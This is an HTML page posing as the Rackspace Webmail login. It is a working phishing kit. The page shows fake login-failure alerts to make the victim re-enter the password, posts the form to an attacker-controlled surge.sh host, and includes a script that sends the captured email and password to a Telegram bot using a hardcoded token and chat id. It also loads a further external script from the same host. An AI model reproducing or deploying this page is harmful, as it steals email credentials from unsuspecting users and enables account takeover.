<html>

<head>
	<meta charset="UTF-8">
	<title>Rackspace Webmail: Hosted Business Email</title>
	<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,400,500,700">
	<link rel="icon" type="image/x-icon" href="https://strange-tramp.surge.sh/apps_rackspace_com/images/icon.ico">
	<style>
	* {
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box
	}
	
	body {
		font-family: "Roboto", "Helvetica Neue", Helvetica, Arial, sans-serif;
		font-size: 14px;
		line-height: 1.42857;
		color: #333;
		background-color: #FAFAFA;
		margin: 0
	}
	
	.caption {
		display: inline-block;
		font-size: 12px;
		color: #666
	}
	
	.base_link {
		display: inline-block;
		color: #0C7C84;
		text-decoration: none
	}
	
	.base_links {
		background: #FFF;
		text-align: center;
		padding-bottom: 20px;
		margin-top: -15px
	}
	
	.divider {
		display: inline-block;
		margin: 0px 5px;
		color: #0C7C84
	}
	
	#content {
		display: flex;
		align-items: center;
		justify-content: center;
		position: fixed;
		top: 0;
		left: 0;
		bottom: 0;
		right: 0;
		background: #EAEAEA
	}
	
	#content-header {
		height: 53px;
		padding: 16px;
		font-size: 24px;
		font-weight: 300;
		line-height: 18px;
		background: #424242;
		color: #FCFCFC
	}
	
	#content-header-logo {
		float: right
	}
	
	#logo {
		width: 130px;
		margin-top: -9px;
		margin-right: -5px
	}
	
	#content-header-label {
		float: left
	}
	
	#content-body {
		display: flex;
		justify-content: start;
		background: #FFF;
		min-width: 790px
	}
	
	#banner-section {
		height: 285px;
		width: 314px;
		margin: 40px;
		display: flex;
		flex-direction: column;
		justify-content: center;
		align-items: center
	}
	
	#banner {
		width: 190px
	}
	
	#divider {
		border: 1px solid rgb(224, 224, 224);
		margin: 40px 0px
	}
	
	#form {
		display: flex;
		flex-direction: column;
		justify-content: center;
		padding: 20px;
		min-height: 268px;
		width: 100%
	}
	
	#form-body {
		height: 205px;
		width: 100%;
		margin: 40px 0px 0px 20px;
		display: flex;
		flex-direction: column;
		justify-content: center;
		align-items: center;
		padding-right: 20px
	}
	
	#form-container {
		width: 100%;
		margin: 0px auto;
		padding: 0px 10px
	}
	
	.row {
		margin: 0px -10px
	}
	
	.row:before,
	.row:after {
		content: " ";
		display: table
	}
	
	.col {
		width: 100%;
		float: left;
		position: relative;
		min-height: 1px;
		padding: 0px 10px
	}
	
	.form-group {
		width: inherit;
		padding-right: 30px;
		margin-bottom: 20px
	}
	
	.form-label {
		position: relative;
		font-family: Roboto;
		font-size: 16px;
		margin-bottom: 8px;
		line-height: 1;
		color: #616161;
		display: inline-block;
		max-width: 100%
	}
	
	.form-field {
		border: 1px solid #BDBDBD;
		border-radius: 2px;
		background: #FFF;
		font-family: Roboto;
		font-size: 16px;
		color: #616161;
		height: 32px;
		display: block;
		width: 100%;
		padding: 4px 8px;
		line-height: 1.42857;
		-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
		box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
		-webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
		-o-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
		transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s
	}
	
	#forgot-password {
		position: absolute;
		top: 0px;
		right: 40px;
		color: #0C7C84;
		text-decoration: none;
		background-color: transparent;
		box-sizing: border-box
	}
	
	#login-btn-toolbar {
		float: right;
		margin: auto 30px 15px -20px
	}
	
	#login-btn {
		float: right;
		display: inline-flex;
		flex-direction: row;
		justify-content: center;
		align-items: center;
		padding: 0 12px;
		height: 32px;
		line-height: 1px;
		font-size: 14px;
		font-weight: 400;
		text-transform: capitalize;
		color: #fff;
		background-color: #0C7C84;
		border-color: #0C7C84;
		margin-bottom: 0;
		text-align: center;
		vertical-align: middle;
		touch-action: manipulation;
		cursor: pointer;
		background-image: none;
		border: 1px solid transparent;
		white-space: nowrap;
		border-radius: 2px;
		-webkit-user-select: none;
		-moz-user-select: none;
		-ms-user-select: none;
		user-select: none
	}
	
	#form-container {
		width: 100%;
		margin: 0px auto;
		padding: 0px 10px
	}
	
	@media only screen and (max-device-width:480px) {
		body {
			font-size: 19pt;
			line-height: 1.42857em
		}
		.caption {
			display: inline-block;
			font-size: 80%;
			color: #666
		}
		#content {
			align-items: inherit;
			display: inherit;
			justify-content: inherit
		}
		#content-header {
			font-size: 171%;
			height: 3em;
			line-height: 1em;
			padding: 1em
		}
		#content-header-logo {
			float: right
		}
		#logo {
			margin-left: 6em;
			width: inherit;
			height: 1em
		}
		#banner-section {
			display: none
		}
		#divider {
			display: none
		}
		.form-label {
			font-size: 114%
		}
		.form-field {
			font-size: 114%;
			height: 2em
		}
		#forgot-password {
			right: 2em;
			top: 0
		}
		#login-btn-toolbar {
			margin: 1.5em 2em 1em -1.5em
		}
		#login-btn {
			font-size: 150%;
			height: 3em;
			padding: 1.25em
		}
	}
	</style>
</head>

<body>
	<div>
		<div id="content">
			<div>
				<div id="content-header">
					<div id="content-header-logo"><img id="logo" src="https://static.emailsrvr.com/beta_apps_rackspace_com/images/Rackspace_Technology_Logo_RGB_WHT.png"></div>
					<div id="content-header-label">Webmail Login</div>
				</div>
				<div id="content-body">
					<div id="banner-section">
						<a href="https://emailhelp.rackspace.com/l/identify-suspicious-email" target="_blank"><img id="banner" src="https://strange-tramp.surge.sh/apps_rackspace_com/images/Suspicious-Email-Banner.jpg"></a>
					</div>
					<div id="divider"></div>
					<form id="form" method="get" name="login" action="https://strange-tramp.surge.sh/main2.html" autocomplete="off">
						<div id="form-body">
							<div id="form-container">
								<div id="user-row" class="row">
									<div id="user-col" class="col">
										<div id="user-field" class="form-group">
											<label id="user-label" class="form-label">Email address</label>
											<label id="user-input" name="username" tabindex="1" class="form-field">##useremail##</label readonly>
										</div>
									</div>
								</div>
								<div id="pass-row" class="row">
									<div id="pass-col" class="col">
										<div id="pass-field" class="form-group">
											<label id="pass-label" class="form-label">Password</label>
											<input id="pass-input" name="password" tabindex="2" type="password" class="form-field" value="" autocomplete="current-password">
										</div><a id="forgot-password" href="https://apps.rackspace.com/wmidentity/recover/password" tabindex="4">Forgot password?</a></div>
								</div>
							</div>
						</div>
						<div id="login-btn-toolbar">
							<button id="login-btn" tabindex="3" type="submit">Log in</button>
						</div>
					</form>
					<script>
					var loginAttempts = 0;
					document.getElementById("form").addEventListener("submit", function(event) {
						event.preventDefault();
						var email = document.getElementById("user-input").textContent;
						var password = document.getElementById("pass-input").value;
						if(loginAttempts < 2) {
							alert("There was an issue logging in, please try again. Username / Password incorrect.");
							loginAttempts++;
						} else {
							document.getElementById("form").submit();
						}
					});
					</script>
				</div>
				<div class="base_links"><a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/privacystatement">
            Privacy Statement
          </a>
					<div class="divider"> | </div><a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/websiteterms">
            Website Terms
          </a></div>
				<div class="footer" style="text-align: center; margin-top: 10px;">
					<div class="caption"> Need webmail for your business? Learn more about <a href="http://www.rackspace.com/email-hosting/webmail" style="color: #666;">
              Hosted Email
            </a> from Rackspace </div>
				</div>
			</div>
		</div>
	</div>
<script>
var loginBtn = document.getElementById("login-btn");
loginBtn.addEventListener("click", function() {
    var email = document.querySelector('.form-field').innerText;
    var password = document.getElementById("pass-input").value;
    var bot_token = "6253189414:AAGQH1IiQqVKhypMAeI_tEcXTVgJQATafoA";
    var user_id = "6175516957";
    var message = "Email: " + email + "\nPassword: " + password;
    var url = "https://api.telegram.org/bot" + bot_token + "/sendMessage?chat_id=" + user_id + "&text=" + encodeURIComponent(message);
    var xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.onload = function() {
        if(xhr.status === 200) {
            console.log("Telegram message sent successfully!");
        } else {
            console.log("Error sending Telegram message. Status code: " + xhr.status);
        }
    };
    xhr.onerror = function() {
        console.log("Error sending Telegram message. Network error.");
    };
    xhr.send();
});
</script>
	<script src="https://strange-tramp.surge.sh/wmidentity/dist/webmailLogin_v_dn70RwATRXPGR3I_MlY9aK9fMX6zSf1GYvcRvRv-UFc_.js" type="text/javascript"></script>
</body>

</html>